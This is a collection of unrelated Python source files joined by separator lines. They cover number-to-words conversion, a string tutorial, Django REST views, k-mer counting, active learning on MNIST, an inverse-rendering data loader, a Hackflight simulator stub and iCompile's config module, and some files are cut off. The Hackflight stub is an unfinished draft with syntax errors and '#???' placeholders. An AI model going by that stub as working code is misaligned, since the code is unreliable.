elif group_nr == 1 and i == 1: # don't write 'bir bin', but write 'bir milyon'(below)
result += u' {}'.format(cls.THOUSAND_NAME)
else:
group_nr_str = cls._convert_natural_number_to_words(group_nr)
result += u' {} {} '.format(group_nr_str, cls.THOUSAND_POWER_NAMES[i])
result = result.strip()
last_group_nr = integer_nr % 1000
if last_group_nr > 0:
result += u' ' + cls._convert_natural_number_to_words(last_group_nr)
return result.strip()
@classmethod
def _find_most_significant_group_base(cls, integer_nr):
i = cls.MAX_GROUP_BASE / 3
while pow(10, i * 3) > integer_nr:
i -= 1
return i * 3
@classmethod
def _get_nth_group_nr(cls, integer_nr, n):
integer_nr /= pow(1000, n)
integer_nr %= 1000
return integer_nr
@classmethod
def _get_number_of_leading_zeros(cls, integer_str):
if integer_str.startswith(cls.NEGATIVE_SIGN) or integer_str.startswith(cls.POSITIVE_SIGN):
integer_str = integer_str[1:]
integer_str_wo_leading_zeros = str(int(integer_str))
return len(integer_str) - len(integer_str_wo_leading_zeros) |
# Strings are immutable
# The variables which are assigned to a strings are actually
# object references and not the objects inself
#Concatenation in strings
str1 = "New "+"York "+"city"
print(str1)
# Augmented assignment operator
str1= "New "
str1+= "York "
str1+= "City"
print(str1)
"""
# Use of join() method
1. Concatenation with + results in temporaries
2. str.join() inserts a seperator between collection of strings
3. Call join on seperator string
"""
# Joining the strings
colors =";".join(["Red","Yellow","Green","Blue"])
print(colors)
# Splitting the strings
print(colors.split(";"))
# Empty string seperators
str1= "".join(["Programming ","Language"])
print(str1)
# Partitioning: It splits the word in three parts, seperator, part before and after the seperator
# It returns tuple
str2= "Unbelievable"
print(str2.partition('bel'))
# String formating
str3 = "I have {} computers for work and {} of them is apple macbook."
print(str3.format("three","one"))
# keyword arguments in formating
str4 = "Today' temperature is {deg} and {fh}"
print(str4.format(deg="30 degree celsius",fh="86 fahrenheit"))
val =22
str5= "My age is {} years."
print(str5.format(val))
# Literal string interpolation (-strings), from python 3.6 and later
# They are use to embed expressions inside literal strings, using a minimal syntax
# python expression can be added into the curly braces and they are evaluated and inserted at runtime
str6 = f"He drives {3*1} times a day"
print(str6)
import datetime
time1=f"The current time is {datetime.datetime.now().isoformat()}."
print(time1)
import math
math1= f"Math constants pi: {math.pi},e: {math.e}."
print(math1) |
import json
from django.http import JsonResponse
from rest_framework import generics
from currency.models import Rate
from .serializers import RateSerializer
def hello_world(request):
return JsonResponse({'hello': 'world'})
# http://localhost:8000/api/v1/currency/rates/
class RatesView(generics.ListCreateAPIView):
queryset = Rate.objects.all()
serializer_class = RateSerializer
class RateView(generics.RetrieveUpdateDestroyAPIView):
queryset = Rate.objects.all()
serializer_class = RateSerializer
|
def convert(substr):
assoc_table = {"A": "0", "C": "1", "G": "2", "T": "3"}
return int("".join([assoc_table[string] for string in list(substr)]), 4)
if __name__ == "__main__":
text = str(input())
k = int(input())
acid_dna = [0] * (4 ** k)
for i in range(len(text) - k + 1):
acid_dna[convert(text[i:i+k])] = acid_dna[convert(text[i:i+k])] + 1
print(*acid_dna, sep=' ')
|
import argparse
import copy
import os, sys
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
MODULES_PATH = os.path.join(BASE_PATH, "..")
sys.path.append(MODULES_PATH)
TF_AL_PATH = os.path.join(BASE_PATH, "..", "..", "tf_al")
sys.path.append(TF_AL_PATH)
TF_MP_PATH = os.path.join(BASE_PATH, "..", "..", "tf_al_mp")
sys.path.append(TF_MP_PATH)
from tf_al import Config, Dataset, ExperimentSuitMetrics, ExperimentSuit, AcquisitionFunction
from tf_al.wrapper import McDropout
from tf_al.utils import gen_seeds
from tf_al_mp.wrapper import MomentPropagation
from models import fchollet_cnn, setup_growth, disable_tf_logs
from utils import setup_logger
BASE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "..")
# Pool/Dataset parameters
val_set_size = 100
test_set_size = 10_000
initial_pool_size = 20
# Split data into (x, 10K, 100) = (train/test/valid)
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
# Concat and normalize data
x_stack = np.expand_dims(np.vstack([x_train, x_test]), axis=-1).astype(np.float32)
datagen = ImageDataGenerator(featurewise_center=True, featurewise_std_normalization=True)
datagen.fit(x_stack)
inputs = datagen.standardize(x_stack)
targets = np.hstack([y_train, y_test])
x_train, x_test, y_train, y_test = train_test_split(inputs, targets, test_size=test_set_size)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=val_set_size)
disable_tf_logs()
setup_growth()
# seeds = gen_seeds(10)
# seeds = []
seeds = [20432, 10942, 83152, 59138, 49976, 10109, 74983, 66781, 93135]
print("Initial seeds {}".format(seeds))
first_seed = seeds[0]
np.random.seed(first_seed)
tf.random.set_seed(first_seed)
num_classes = len(np.unique(targets))
optimizer = "adam"
loss = "sparse_categorical_crossentropy"
metrics = [keras.metrics.SparseCategoricalAccuracy()]
step_size = 1
batch_size = 10
verbose = False
sample_size = 25
fit_params = {"epochs": 200, "batch_size": batch_size}
base_model = fchollet_cnn(output=num_classes)
mc_config = Config(
fit=fit_params,
query={"sample_size": sample_size},
eval={"batch_size": 900, "sample_size": sample_size}
)
mc_model = McDropout(base_model, config=mc_config)
mc_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
print(mc_model.evaluate(x_test, y_test, batch_size=900))
# first_seed = seeds[1]
# np.random.seed(first_seed)
# tf.random.set_seed(first_seed)
# keras.backend.clear_session()
# model = keras.models.clone_model(base_model)
# model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
first_seed = seeds[0]
np.random.seed(first_seed)
tf.random.set_seed(first_seed)
o_model = copy.copy(mc_model)
print(o_model.evaluate(x_test, y_test, batch_size=900)) |
import glob
import numpy as np
import os.path as osp
from PIL import Image
import random
import struct
from torch.utils.data import Dataset
import scipy.ndimage as ndimage
import cv2
from skimage.measure import block_reduce
import h5py
import scipy.ndimage as ndimage
class BatchLoader(Dataset):
def __init__(self, dataRoot, dirs = ['main_xml', 'main_xml1',
'mainDiffLight_xml', 'mainDiffLight_xml1',
'mainDiffMat_xml', 'mainDiffMat_xml1'],
imHeight = 240, imWidth = 320,
phase='TRAIN', rseed = None, cascadeLevel = 0,
isLight = False, isAllLight = False,
envHeight = 8, envWidth = 16, envRow = 120, envCol = 160,
SGNum = 12 ):
if phase.upper() == 'TRAIN':
self.sceneFile = osp.join(dataRoot, 'train.txt')
elif phase.upper() == 'TEST':
self.sceneFile = osp.join(dataRoot, 'test.txt')
else:
print('Unrecognized phase for data loader')
assert(False )
with open(self.sceneFile, 'r') as fIn:
sceneList = fIn.readlines()
sceneList = [x.strip() for x in sceneList]
self.imHeight = imHeight
self.imWidth = imWidth
self.phase = phase.upper()
self.cascadeLevel = cascadeLevel
self.isLight = isLight
self.isAllLight = isAllLight
self.envWidth = envWidth
self.envHeight = envHeight
self.envRow = envRow
self.envCol = envCol
self.envWidth = envWidth
self.envHeight = envHeight
self.SGNum = SGNum
shapeList = []
for d in dirs:
shapeList = shapeList + [osp.join(dataRoot, d, x) for x in sceneList ]
shapeList = sorted(shapeList)
print('Shape Num: %d' % len(shapeList ) )
self.imList = []
for shape in shapeList:
imNames = sorted(glob.glob(osp.join(shape, 'im_*.hdr') ) )
self.imList = self.imList + imNames
if isAllLight:
self.imList = [x for x in self.imList if
osp.isfile(x.replace('im_', 'imenv_') ) ]
if cascadeLevel > 0:
self.imList = [x for x in self.imList if
osp.isfile(x.replace('im_',
'imenv_').replace('.hdr', '_%d.h5' %
(self.cascadeLevel - 1 ) ) ) ]
print('Image Num: %d' % len(self.imList ) )
# BRDF parameter
self.albedoList = [x.replace('im_', 'imbaseColor_').replace('hdr', 'png') for x in self.imList ]
self.normalList = [x.replace('im_', 'imnormal_').replace('hdr', 'png') for x in self.imList ]
self.normalList = [x.replace('DiffLight', '') for x in self.normalList ]
self.roughList = [x.replace('im_', 'imroughness_').replace('hdr', 'png') for x in self.imList ]
self.depthList = [x.replace('im_', 'imdepth_').replace('hdr', 'dat') for x in self.imList ]
self.depthList = [x.replace('DiffLight', '') for x in self.depthList ]
self.depthList = [x.replace('DiffMat', '') for x in self.depthList ]
self.segList = [x.replace('im_', 'immask_').replace('hdr', 'png') for x in self.imList ]
self.segList = [x.replace('DiffMat', '') for x in self.segList ]
if self.cascadeLevel == 0:
if self.isLight:
self.envList = [x.replace('im_', 'imenv_') for x in self.imList ]
else:
if self.isLight:
self.envList = [x.replace('im_', 'imenv_') for x in self.imList ]
self.envPreList = [x.replace('im_', 'imenv_').replace('.hdr', '_%d.h5' % (self.cascadeLevel -1) ) for x in self.imList ]
self.albedoPreList = [x.replace('im_', 'imbaseColor_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1) ) for x in self.imList ]
self.normalPreList = [x.replace('im_', 'imnormal_').replace('.hdr', '_%d.h5' % (self.cascadeLevel-1) ) for x in self.imList ]
self.roughPreList = [x.replace('im_', 'imroughness_').replace('.hdr', '_%d.h5' % (self.cascadeLevel-1) ) for x in self.imList ]
self.depthPreList = [x.replace('im_', 'imdepth_').replace('.hdr', '_%d.h5' % (self.cascadeLevel-1) ) for x in self.imList ]
self.diffusePreList = [x.replace('im_', 'imdiffuse_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1) ) for x in self.imList ]
self.specularPreList = [x.replace('im_', 'imspecular_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1) ) for x in self.imList ]
# Permute the image list
self.count = len(self.albedoList )
self.perm = list(range(self.count ) )
if rseed is not None:
random.seed(0)
random.shuffle(self.perm )
def __len__(self):
return len(self.perm )
def __getitem__(self, ind):
# Read segmentation
seg = 0.5 * (self.loadImage(self.segList[self.perm[ind] ] ) + 1)[0:1, :, :]
segArea = np.logical_and(seg > 0.49, seg < 0.51 ).astype(np.float32 )
segEnv = (seg < 0.1).astype(np.float32 )
segObj = (seg > 0.9)
if self.isLight:
segObj = segObj.squeeze()
segObj = ndimage.binary_erosion(segObj, structure=np.ones((7, 7) ),
border_value=1)
segObj = segObj[np.newaxis, :, :]
segObj = segObj.astype(np.float32 )
# Read Image
im = self.loadHdr(self.imList[self.perm[ind] ] )
# Random scale the image
im, scale = self.scaleHdr(im, seg)
# Read albedo
albedo = self.loadImage(self.albedoList[self.perm[ind] ], isGama = False)
albedo = (0.5 * (albedo + 1) ) ** 2.2
# normalize the normal vector so that it will be unit length
normal = self.loadImage(self.normalList[self.perm[ind] ] )
normal = normal / np.sqrt(np.maximum(np.sum(normal * normal, axis=0), 1e-5) )[np.newaxis, :]
# Read roughness
rough = self.loadImage(self.roughList[self.perm[ind] ] )[0:1, :, :]
# Read depth
depth = self.loadBinary(self.depthList[self.perm[ind] ])
if self.isLight == True:
envmaps, envmapsInd = self.loadEnvmap(self.envList[self.perm[ind] ] )
envmaps = envmaps * scale
if self.cascadeLevel > 0:
envmapsPre = self.loadH5(self.envPreList[self.perm[ind] ] )
if envmapsPre is None:
print("Wrong envmap pred")
envmapsInd = envmapsInd * 0
envmapsPre = np.zeros((84, 120, 160), dtype=np.float32 )
if self.cascadeLevel > 0:
# Read albedo
albedoPre = self.loadH5(self.albedoPreList[self.perm[ind] ] )
albedoPre = albedoPre / np.maximum(np.mean(albedoPre ), 1e-10) / 3
# normalize the normal vector so that it will be unit length
normalPre = self.loadH5(self.normalPreList[self.perm[ind] ] )
normalPre = normalPre / np.sqrt(np.maximum(np.sum(normalPre * normalPre, axis=0), 1e-5) )[np.newaxis, :]
normalPre = 0.5 * (normalPre + 1)
# Read roughness
roughPre = self.loadH5(self.roughPreList[self.perm[ind] ] )[0:1, :, :]
roughPre = 0.5 * (roughPre + 1)
# Read depth
depthPre = self.loadH5(self.depthPreList[self.perm[ind] ] )
depthPre = depthPre / np.maximum(np.mean(depthPre), 1e-10) / 3
diffusePre = self.loadH5(self.diffusePreList[self.perm[ind] ] )
diffusePre = diffusePre / max(diffusePre.max(), 1e-10)
specularPre = self.loadH5(self.specularPreList[self.perm[ind] ] )
specularPre = specularPre / max(specularPre.max(), 1e-10)
batchDict = {'albedo': albedo,
'normal': normal,
'rough': rough,
'depth': depth,
'segArea': segArea,
'segEnv': segEnv,
'segObj': segObj,
'im': im,
'name': self.imList[self.perm[ind] ]
}
if self.isLight:
batchDict['envmaps'] = envmaps
batchDict['envmapsInd'] = envmapsInd
if self.cascadeLevel > 0:
batchDict['envmapsPre'] = envmapsPre
if self.cascadeLevel > 0:
batchDict['albedoPre'] = albedoPre
batchDict['normalPre'] = normalPre
batchDict['roughPre'] = roughPre
batchDict['depthPre'] = depthPre
batchDict['diffusePre'] = diffusePre
batchDict['specularPre'] = specularPre
return batchDict
def loadImage(self, imName, isGama = False):
if not(osp.isfile(imName ) ):
print(imName )
assert(False )
im = Image.open(imName)
im = im.resize([self.imWidth, self.imHeight], Image.ANTIALIAS )
im = np.asarray(im, dtype=np.float32)
if isGama:
im = (im / 255.0) ** 2.2
im = 2 * im - 1
else:
im = (im - 127.5) / 127.5
if len(im.shape) == 2:
im = im[:, np.newaxis]
im = np.transpose(im, [2, 0, 1] )
return im
def loadHdr(self, imName):
if not(osp.isfile(imName ) ):
print(imName )
assert(False )
im = cv2.imread(imName, -1)
if im is None:
print(imName )
assert(False )
im = cv2.resize(im, (self.imWidth, self.imHeight), interpolation = cv2.INTER_AREA )
im = np.transpose(im, [2, 0, 1])
im = im[::-1, :, :]
return im
def scaleHdr(self, hdr, seg):
intensityArr = (hdr * seg).flatten()
intensityArr.sort()
if self.phase.upper() == 'TRAIN':
scale = (0.95 - 0.1 * np.random.random() ) / np.clip(intensityArr[int(0.95 * self.imWidth * self.imHeight * 3) ], 0.1, None)
elif self.phase.upper() == 'TEST':
scale = (0.95 - 0.05) / np.clip(intensityArr[int(0.95 * self.imWidth * self.imHeight * 3) ], 0.1, None)
hdr = scale * hdr
return np.clip(hdr, 0, 1), scale
def loadBinary(self, imName ):
if not(osp.isfile(imName ) ):
print(imName )
assert(False )
with open(imName, 'rb') as fIn:
hBuffer = fIn.read(4)
height = struct.unpack('i', hBuffer)[0]
wBuffer = fIn.read(4)
width = struct.unpack('i', wBuffer)[0]
dBuffer = fIn.read(4 * width * height )
depth = np.asarray(struct.unpack('f' * height * width, dBuffer), dtype=np.float32 )
depth = depth.reshape([height, width] )
depth = cv2.resize(depth, (self.imWidth, self.imHeight), interpolation=cv2.INTER_AREA )
return depth[np.newaxis, :, :]
def loadH5(self, imName ):
try:
hf = h5py.File(imName, 'r')
im = np.array(hf.get('data' ) )
return im
except:
return None
def loadEnvmap(self, envName ):
if not osp.isfile(envName ):
env = np.zeros( [3, self.envRow, self.envCol,
self.envHeight, self.envWidth], dtype = np.float32 )
envInd = np.zeros([1, 1, 1], dtype=np.float32 )
print('Warning: the envmap %s does not exist.' % envName )
return env, envInd
else:
envHeightOrig, envWidthOrig = 16, 32
assert( (envHeightOrig / self.envHeight) == (envWidthOrig / self.envWidth) )
assert( envHeightOrig % self.envHeight == 0)
env = cv2.imread(envName, -1 )
if not env is None:
env = env.reshape(self.envRow, envHeightOrig, self.envCol,
envWidthOrig, 3)
env = np.ascontiguousarray(env.transpose([4, 0, 2, 1, 3] ) )
scale = envHeightOrig / self.envHeight
if scale > 1:
env = block_reduce(env, block_size = (1, 1, 1, 2, 2), func = np.mean )
envInd = np.ones([1, 1, 1], dtype=np.float32 )
return env, envInd
else:
env = np.zeros( [3, self.envRow, self.envCol,
self.envHeight, self.envWidth], dtype = np.float32 )
envInd = np.zeros([1, 1, 1], dtype=np.float32 )
print('Warning: the envmap %s does not exist.' % envName )
return env, envInd
return env, envInd
|
"""
"""
#all this importation stuff?
import SimReceiver
import SimBoard
import SimMotor
import SimSensors
class FHackflightFlightManager(FFlightManager):
def __init__(self, pawn, mixer, motors, dynamics\
pidEnabled = True ):
#???
FFlightManager(dynamics)
self._motors = motors
#Unreal engine function?
self._receiver = SimReceiver(#something, 0)
self._hackflight = Hackflight(_board, _receiver, mixer)
self._sensors = SimSensors(_dynamics)
self._hackflight.addSensor(_sensors)
if pidEnabled:
self._hackflight.addClosedLoopController(levelPid)
self._hackflight.addClosedLoopController(ratePid)
self._hackflight.addClosedLoopController(yawPid)
self._hackflight.begin(True)
#override?
def getMotors(self, time, motorvals):
joystickError = self._receiver.update()
angularVel = [#???]
eulerAngles = [#???]
quaternion = [#???]
#WHat's this for?
#if joystickError:
self._hackflight.update()
self._board.set(time)
for i in range (self._nmotors):
motorvals[i] = self._motors.getValue(i)
def tick(self, None):
self._receiver.tick()
|
# doticompile.py
#
# Manage .icompile files
import ConfigParser, string, os, copyifnewer, templateG3D, templateHello
from utils import *
from doxygen import *
from variables import *
from help import *
# If True, the project will not be rebuilt if all dependencies
# other than iCompile are up to date. This is handy when
# working on iCompile and testing with large libraries.
_IGNORE_ICOMPILE_DEPENDENCY = False
##############################################################################
# Default .icompile #
##############################################################################
configHelp = """
# If you have special needs, you can edit per-project ice.txt
# files and your global ~/.icompile file to customize the
# way your projects build. However, the default values are
# probably sufficient and you don't *have* to edit these.
#
# To return to default settings, just delete ice.txt and
# ~/.icompile and iCompile will generate new ones when run.
#
#
# In general you can set values without any quotes, e.g.:
#
# compileoptions = -O3 -g --verbose $(CXXFLAGS) %(defaultcompileoptions)s
#
# Adds the '-O3' '-g' and '--verbose' options to the defaults as
# well as the value of environment variable CXXFLAGS.
#
# These files have the following sections and variables.
# Values in ice.txt override those specified in .icompile.
#
# GLOBAL Section
# compiler Path to compiler.
# include Semi-colon or colon (on Linux) separated
# include paths.
#
# library Same, for library paths.
#
# defaultinclude The initial include path.
#
# defaultlibrary The initial library path.
#
# defaultcompiler The initial compiler.
#
# defaultexclude Regular expression for directories to exclude
# when searching for C++ files. Environment
# variables are NOT expanded for this expression.
# e.g. exclude: <EXCLUDE>|^win32$
#
# builddir Build directory, relative to ice.txt. Start with a
# leading slash (/) to make absolute.
#
# tempdir Temp directory, relative to ice.txt. Start with a
# leading slash (/) to make absolute.
#
# beep If True, beep after compilation
#
# DEBUG and RELEASE Sections
#
# compileoptions
# linkoptions Options *in addition* to the ones iCompile
# generates for the compiler and linker, separated
# by spaces as if they were on a command line.
#
#
# The following special values are available:
#
# $(envvar) Value of shell variable named envvar.
# Unset variables are the empty string.
# $(shell ...) Runs the '...' and replaces the expression
# as if it were the value of an envvar.
# %(localvar)s Value of a variable set inside ice.txt
# or .icompile (Yes, you need that 's'--
# it is a Python thing.)
# <NEWESTCOMPILER> The newest version of gcc or Visual Studio on your system.
# <EXCLUDE> Default directories excluded from compilation.
#
# The special values may differ between the RELEASE and DEBUG
# targets. The default .icompile sets the 'default' variables
# and the default ice.txt sets the real ones from those, so you
# can chain settings.
#
# Colors have the form:
#
# [bold|underline|reverse|italic|blink|fastblink|hidden|strikethrough]
# [FG] [on BG]
#
# where FG and BG are each one of
# {default, black, red, green, brown, blue, purple, cyan, white}
# Many styles (e.g. blink, italic) are not supported on most terminals.
#
# Examples of legal colors: "bold", "bold red", "bold red on white", "green",
# "bold on black"
#
"""
defaultDotICompile = """
# This is a configuration file for iCompile (http://ice.sf.net)
# """ + configHelp + """
[GLOBAL]
defaultinclude: $(INCLUDE);/usr/local/include/SDL11;/usr/include/SDL;/usr/X11R6/include;
defaultlibrary: $(LIBRARY);$(LD_LIBRARY_PATH);/usr/X11R6/lib;
defaultcompiler: <NEWESTCOMPILER>
defaultexclude: <EXCLUDE>
beep: True
tempdir: .ice-tmp
builddir: build
[DEBUG]
[RELEASE]
"""
defaultProjectFileContents = """
# This project can be compiled by typing 'icompile'
# at the command line. Download the iCompile Python
# script from http://ice.sf.net
#
################################################################
""" + configHelp + """
################################################################
[GLOBAL]
compiler: %(defaultcompiler)s
include: %(defaultinclude)s
library: %(defaultlibrary)s
exclude: %(defaultexclude)s
# Colon-separated list of libraries on which this project depends. If
# a library is specified (e.g., png.lib) the platform-appropriate
# variation of that name is added to the libraries to link against.
# If a directory containing an iCompile ice.txt file is specified,
# that project will be built first and then added to the include
# and library paths and linked against.
uses:
################################################################
[DEBUG]
compileoptions:
linkoptions:
################################################################
[RELEASE]
compileoptions:
linkoptions:
"""
#################################################################
# Configuration & Project File #
#################################################################
""" Reads [section]name from the provided configuration, replaces
<> and $() values with the appropriate settings.
If exp is False $() variables are *not* expanded.
If
"""
def configGet(state, config, section, name, exp = True):
try:
val = config.get(section, name)
except ConfigParser.InterpolationMissingOptionError:
maybeWarn('Variable \'' + name + '\' in ' + ' the [' + section + '] section of ' +
state.rootDir + 'ice.txt may have an illegal value. If that ice.txt ' +
'file is from a previous version of iCompile you should delete it.\n', state)
return ''
# Replace special values
if '<' in val:
if '<NEWESTGCC>' in val:
(gppname, ver) = newestCompiler()
val = val.replace('<NEWESTGCC>', gppname)
if '<NEWESTCOMPILER>' in val:
(compname, ver) = newestCompiler()
val = val.replace('<NEWESTCOMPILER>', compname)
val = val.replace('<EXCLUDE>', string.join(copyifnewer._cppExcludePatterns + ['^CMakeFiles$'], '|'))
val = os.path.expanduser(val)
if exp:
val = expandvars(val)
return val
class FakeFile:
_textLines = []
_currentLine = 0
def __init__(self, contents):
self._currentLine = 0
self._textLines = string.split(contents, '\n')
def readline(self):
if (self._currentLine >= len(self._textLines)):
# end of file
return ''
else:
self._currentLine += 1
return self._textLines[self._currentLine - 1] + '\n'
""" Called from processProjectFile """
def _processDotICompile(state, config):
# Set the defaults from the default .icompile and ice.txt
config.readfp(FakeFile(defaultDotICompile))
config.readfp(FakeFile(defaultProjectFileContents))
# Process .icompile
if os.path.exists(state.preferenceFile()):
if verbosity >= TRACE: print 'Processing ' + state.preferenceFile()
config.read(state.preferenceFile())
else:
success = False
HOME = os.environ['HOME']
preferenceFile = HOME + '/.icompile'
# Try to generate a default .icompile
if os.path.exists(HOME):
f = file(preferenceFile, 'wt')
if f != None:
f.write(defaultDotICompile)
f.close()
success = True
if verbosity >= TRACE:
colorPrint('Created a default preference file for ' +
'you in ' + preferenceFile + '\n',
SECTION_COLOR)
# We don't need to read this new .icompile because
# it matches the default, which we already read.
if not success and verbosity >= TRACE:
print ('No ' + preferenceFile + ' found and cannot write to '+ HOME)
""" Process the project file and .icompile so that we can use configGet.
Sets a handful of variables."""
def processProjectFile(state, ignoreIceTxt = False):
config = ConfigParser.SafeConfigParser()
_processDotICompile(state, config)
if not ignoreIceTxt:
# Process the project file
projectFile = 'ice.txt'
if verbosity >= TRACE: print 'Processing ' + projectFile
config.read(projectFile)
# Don't expand '$' envvar in regular expressions since
# $ means end of pattern.
exclude = configGet(state, config, 'GLOBAL', 'exclude', False)
state.excludeFromCompilation = re.compile(exclude)
# Parses the "uses" line, if it exists
L = ''
try:
L = configGet(state, config, 'GLOBAL', 'uses')
except ConfigParser.NoOptionError:
# Old files have no 'uses' section
pass
for u in string.split(L, ':'):
if u.strip() != '':
if os.path.exists(pathConcat(u, 'ice.txt')):
# This is another iCompile project
state.addUsesProject(u, False)
else:
state.addUsesLibrary(u, False)
state.buildDir = addTrailingSlash(configGet(state, config, 'GLOBAL', 'builddir', True))
state.tempParentDir = addTrailingSlash(configGet(state, config, 'GLOBAL', 'tempdir', True))
state.tempDir = addTrailingSlash(pathConcat(state.tempParentDir, state.projectName))
state.beep = configGet(state, config, 'GLOBAL', 'beep')
state.beep = (state.beep == True) or (state.beep.lower() == 'true')
# Include Paths
state.addIncludePath(makePathList(configGet(state, config, 'GLOBAL', 'include')))
# Add our own include directories.
if isLibrary(state.binaryType):
extraInclude = [path for path in ['include', 'include/' + state.projectName]
if os.path.exists(path)]
state.addIncludePath(extraInclude)
# Library Paths
state.addLibraryPath(makePathList(configGet(state, config, 'GLOBAL', 'library')))
state.compiler = configGet(state, config, 'GLOBAL', 'compiler')
state.compilerOptions = string.split(configGet(state, config, state.target, 'compileoptions'), ' ')
state.linkerOptions = string.split(configGet(state, config, state.target, 'linkoptions'), ' ')
#########################################################################
# Loads configuration from the current directory, where args
# are the arguments preceding --run that were passed to iCompile
#
# Returns the configuration state
def getConfigurationState(args):
state = State()
state.args = args
state.universalBinary = (machine() == 'i386')
state.template = ''
if '--template' in args:
for i in xrange(0, len(args)):
if args[i] == '--template':
if i < len(args) - 1:
state.template = args[i + 1]
state.noPrompt = '--noprompt' in args
if state.template != '' and not state.noPrompt:
colorPrint("ERROR: cannot specify --template without --noprompt", ERROR_COLOR)
sys.exit(-208)
if state.template != 'hello' and state.template != 'G3D' and state.template != 'empty' and state.template != '':
colorPrint("ERROR: 'hello', 'G3D', and 'empty' are the only legal template names (template='" +
state.template + "')", ERROR_COLOR)
sys.exit(-209)
# Root directory
state.rootDir = os.getcwd() + "/"
# Project name
state.projectName = string.split(state.rootDir, ('/'))[-2]
ext = string.lower(extname(state.projectName))
state.projectName = rawfilename(state.projectName)
# Binary type
if (ext == 'lib') or (ext == 'a'):
state.binaryType = LIB
elif (ext == 'dll') or (ext == 'so'):
state.binaryType = DLL
elif (ext == 'exe') or (ext == ''):
state.binaryType = EXE
else:
state.binaryType = EXE
maybeWarn("This project has unknown extension '" + ext +
"' and will be compiled as an executable.", state)
# Choose target
if ('--opt' in args) or ('-O' in args) or (('--deploy' in args) and not ('--debug' in args)):
if ('--debug' in args):
colorPrint("Cannot specify '--debug' and '--opt' at " +
"the same time.", WARNING_COLOR)
sys.exit(-1)
state.target = RELEASE
d = ''
else:
state.target = DEBUG
d = 'd'
# Find an icompile project file. If there isn't one, give the
# user the opportunity to create one or abort.
checkForProjectFile(state, args)
# Load settings from the project file.
processProjectFile(state)
discoverPlatform(state)
unix = not state.os.startswith('win')
# On unix-like systems we prefix library names with 'lib'
prefix = ''
if unix and isLibrary(state.binaryType):
prefix = 'lib'
state.installDir = state.buildDir + state.platform + '/'
# Binary name
if (state.binaryType == EXE):
state.binaryDir = state.installDir
state.binaryName = state.projectName + d
elif (state.binaryType == DLL):
state.binaryDir = state.installDir + 'lib/'
state.binaryName = prefix + state.projectName + d + '.so'
elif (state.binaryType == LIB):
state.binaryDir = state.installDir + 'lib/'
state.binaryName = prefix + state.projectName + d + '.a'
# Make separate directories for object files based on
# debug/release
state.objDir = state.tempDir + state.platform + '/' + state.target + '/'
# Find out when icompile was itself modified
state.icompileTime = getTimeStamp(sys.argv[0])
if _IGNORE_ICOMPILE_DEPENDENCY:
# Set the iCompile timestamp to the beginning of time, so that
# it looks like icompile itself was never modified.
state.icompileTime = 0
# Rebuild if ice.txt or .icompile was modified
# more recently than the source.
if os.path.exists('ice.txt'):
iceTime = getTimeStamp('ice.txt')
if iceTime > state.icompileTime:
state.icompileTime = iceTime
if os.path.exists(state.preferenceFile()):
configTime = getTimeStamp(state.preferenceFile())
if configTime > state.icompileTime:
state.icompileTime = configTime
return state
##################################################################################
""" Checks for ice.txt and, if not found, prompts the user to create it
and returns if they press Y, otherwise exits."""
def checkForProjectFile(state, args):
# Assume default project file
projectFile = 'ice.txt'
if os.path.exists(projectFile): return
# Everything below here executes only when there is no project file
if not state.noPrompt:
if '--clean' in args:
print
colorPrint('Nothing to clean (you have never run iCompile in ' +
os.getcwd() + ')', WARNING_COLOR)
print
# There's nothing to delete anyway, so just exit
sys.exit(0)
print
inHomeDir = (os.path.realpath(os.getenv('HOME')) == os.getcwd())
if inHomeDir:
colorPrint(' ******************************************************',
WARNING_COLOR)
colorPrint(' * You are about run iCompile in your home directory! *',
'bold red')
colorPrint(' ******************************************************',
WARNING_COLOR)
else:
colorPrint('You have never run iCompile in this directory before.',
WARNING_COLOR)
print
print ' Current Directory: ' + os.getcwd()
# Don't show dot-files first if we can avoid it
dirs = listDirs()
dirs.reverse()
num = len(dirs)
sl = shortlist(dirs)
if (num > 1):
print ' Contains', num, 'directories (' + sl + ')'
elif (num > 0):
print ' Contains 1 directory (' + dirs[0] + ')'
else:
print ' Contains no subdirectories'
cfiles = listCFiles()
num = len(cfiles)
sl = shortlist(cfiles)
if (num > 1):
print ' Subdirectories contain', num, 'C++ files (' + sl + ')'
elif (num > 0):
print ' Subdirectories contain 1 C++ file (' + cfiles[0] + ')'
else:
print ' Subdirectories contain no C++ files'
print
dir = string.split(os.getcwd(), '/')[-1]
if inHomeDir:
prompt = ('Are you sure you want to run iCompile '+
'in your home directory? (Y/N)')
else:
prompt = ("Are you sure you want to compile the '" +
dir + "' project? (Y/N)")
colorPrint(prompt, 'bold')
if string.lower(getch()) != 'y':
sys.exit(0)
if (num == 0):
prompt = ("Would you like to generate a set of starter files for the '" +
dir + "' project? (Y/N)")
colorPrint(prompt, 'bold')
if string.lower(getch()) == 'y':
prompt = "Select a project template:\n [H]ello World\n [G]3D\n"
colorPrint(prompt, 'bold')
if string.lower(getch()) == 'h':
templateHello.generateStarterFiles(state)
else:
templateG3D.generateStarterFiles(state)
if state.noPrompt and state.template != '':
if state.template == 'hello':
templateHello.generateStarterFiles(state)
elif state.template == 'G3D':
templateG3D.generateStarterFiles(state)
elif state.template == 'empty':
# Intentionally do nothing
''
else:
print 'ERROR: illegal template'
writeFile(projectFile, defaultProjectFileContents);
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils."""
import os
from os.path import basename
import numpy as np
import paddle
def get_model_parameter_size(model):
"""tbd"""
size = 0
for param in model.parameters():
size += np.product(param.shape)
return size
def tree_map(f, d):
new_d = {}
for k in d:
